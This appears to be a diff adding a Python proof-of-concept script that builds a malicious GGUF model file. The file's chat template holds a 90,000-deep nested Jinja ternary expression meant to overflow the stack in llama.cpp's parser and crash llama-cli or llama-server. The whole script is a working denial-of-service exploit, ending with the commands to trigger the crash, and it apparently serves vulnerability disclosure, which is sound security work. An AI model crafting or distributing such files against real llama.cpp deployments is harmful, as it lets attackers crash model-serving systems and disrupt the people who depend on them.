salvepilo
/

llama-cpp-jinja-crash-poc

+#!/usr/bin/env python3
+"""
+PoC: Stack Overflow in llama.cpp Jinja Parser via Malicious GGUF Chat Template
+Creates a minimal but valid GGUF model file with a deeply nested Jinja chat
+template that causes a stack overflow (SIGSEGV) when parsed by llama.cpp.
+Vulnerability: Unbounded recursion in parse_if_expression()
+File: common/jinja/parser.cpp, line 336
+"""
+import numpy as np
+from gguf import GGUFWriter
+import os
+def generate_malicious_template(depth=90000):
+    """Generate deeply nested ternary Jinja expression"""
+    parts = ["{{ "]
+    for i in range(depth):
+        parts.append(f"x{i%10} if c{i%10} else ")
+    parts.append("'end' }}")
+    return "".join(parts)
+def create_minimal_llama_gguf(output_path, chat_template, arch="llama"):
+    """Create a minimal valid GGUF file with llama architecture metadata"""
+    writer = GGUFWriter(output_path, arch)
+    # Minimal llama hyperparameters (required to pass model loading)
+    n_embd = 32          # tiny embedding
+    n_head = 4           # 4 attention heads
+    n_head_kv = 4        # same for KV
+    n_layer = 1          # single layer
+    n_ff = 64            # tiny feed-forward
+    n_vocab = 32         # tiny vocabulary
+    ctx_len = 128        # minimal context
+    writer.add_context_length(ctx_len)
+    writer.add_embedding_length(n_embd)
+    writer.add_block_count(n_layer)
+    writer.add_head_count(n_head)
+    writer.add_head_count_kv(n_head_kv)
+    writer.add_feed_forward_length(n_ff)
+    writer.add_vocab_size(n_vocab)
+    writer.add_layer_norm_rms_eps(1e-5)
+    writer.add_rope_dimension_count(n_embd // n_head)
+    # Tokenizer metadata
+    writer.add_tokenizer_model("llama")
+    writer.add_token_list([f"tok_{i}".encode() for i in range(n_vocab)])
+    writer.add_token_scores([0.0] * n_vocab)
+    writer.add_token_types([0] * n_vocab)
+    writer.add_bos_token_id(0)
+    writer.add_eos_token_id(1)
+    # THE MALICIOUS CHAT TEMPLATE
+    writer.add_chat_template(chat_template)
+    # Minimal tensors (required for model loading)
+    # Token embeddings
+    writer.add_tensor("token_embd.weight",
+                     np.zeros((n_vocab, n_embd), dtype=np.float16))
+    # Output norm
+    writer.add_tensor("output_norm.weight",
+                     np.ones(n_embd, dtype=np.float32))
+    # Output projection
+    writer.add_tensor("output.weight",
+                     np.zeros((n_vocab, n_embd), dtype=np.float16))
+    # Single transformer layer
+    writer.add_tensor("blk.0.attn_norm.weight",
+                     np.ones(n_embd, dtype=np.float32))
+    writer.add_tensor("blk.0.attn_q.weight",
+                     np.zeros((n_embd, n_embd), dtype=np.float16))
+    writer.add_tensor("blk.0.attn_k.weight",
+                     np.zeros((n_head_kv * (n_embd // n_head), n_embd), dtype=np.float16))
+    writer.add_tensor("blk.0.attn_v.weight",
+                     np.zeros((n_head_kv * (n_embd // n_head), n_embd), dtype=np.float16))
+    writer.add_tensor("blk.0.attn_output.weight",
+                     np.zeros((n_embd, n_embd), dtype=np.float16))
+    writer.add_tensor("blk.0.ffn_norm.weight",
+                     np.ones(n_embd, dtype=np.float32))
+    writer.add_tensor("blk.0.ffn_gate.weight",
+                     np.zeros((n_ff, n_embd), dtype=np.float16))
+    writer.add_tensor("blk.0.ffn_up.weight",
+                     np.zeros((n_ff, n_embd), dtype=np.float16))
+    writer.add_tensor("blk.0.ffn_down.weight",
+                     np.zeros((n_embd, n_ff), dtype=np.float16))
+    writer.write_header_to_file()
+    writer.write_kv_data_to_file()
+    writer.write_tensors_to_file()
+    writer.close()
+    file_size = os.path.getsize(output_path)
+    print(f"[+] Created: {output_path}")
+    print(f"[+] Size: {file_size} bytes ({file_size/1024:.1f} KB)")
+if __name__ == "__main__":
+    output_dir = "/Users/eltarne/Documents/script/gguf_poc"
+    os.makedirs(output_dir, exist_ok=True)
+    # Crash threshold is ~87150 on macOS 8MB stack
+    # Use 90000 to ensure crash on all platforms
+    depth = 90000
+    print(f"[*] Generating malicious chat template (depth={depth})...")
+    template = generate_malicious_template(depth)
+    print(f"[*] Template size: {len(template)} bytes")
+    output_path = os.path.join(output_dir, "poc_crash_model.gguf")
+    print(f"[*] Creating malicious GGUF model...")
+    create_minimal_llama_gguf(output_path, template)
+    print(f"\n[+] To reproduce the crash:")
+    print(f"[+]   llama-cli -m {output_path} --jinja -p 'hello'")
+    print(f"[+]   llama-server -m {output_path} --jinja")
+    print(f"[+] Expected: Segmentation fault (stack overflow in Jinja parser)")